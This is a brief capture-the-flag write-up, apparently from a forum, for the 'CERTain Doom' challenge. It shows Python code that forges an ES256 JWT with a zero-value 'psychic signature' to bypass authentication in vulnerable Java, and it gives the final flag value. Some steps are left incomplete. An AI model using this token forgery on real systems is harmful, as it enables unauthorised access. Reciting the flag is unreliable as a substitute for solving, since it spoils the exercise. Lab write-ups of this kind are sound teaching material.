CERTain Doom Discussion [WRITE-UP]

The Final Flag

As the chat messages suggest, we need to focus on a JWT authentication bypass vulnerability. Here’s how to solve:

Neil Madden’s blog post on psychic signatures in Java suggests that to bypass the vulnerability, you can create a JWT like this:


payload = 'eyJz....'

jwt = f'eyJ0eXAiOiJKV1QiLCJhbGciOiJFUzI1NiJ9.{payload}.MAYCAQACAQA'

The signature blob will bypass the check.

After some painstaking trials, you can identify the proper claims for the JWT and create valid tokens:

import json, base64

header = {"alg": "ES256", "typ": "JWT"}
payload = {"sub": "hydra", "groups": ["user"]}

def encode(data):
    return base64.urlsafe_b64encode(json.dumps(data, separators=(',', ':')).encode()).decode().rstrip('=')

token = f'{encode(header)}.{encode(payload)}.MAYCAQACAQA'

print(token)

Then, pass the token to Burp Suite:

Download the file:

The flag is on the 8th page:

Flag: THM{H1dD3|\|_1n_Pl41N_516h7}


Keep in mind that:

2 Likes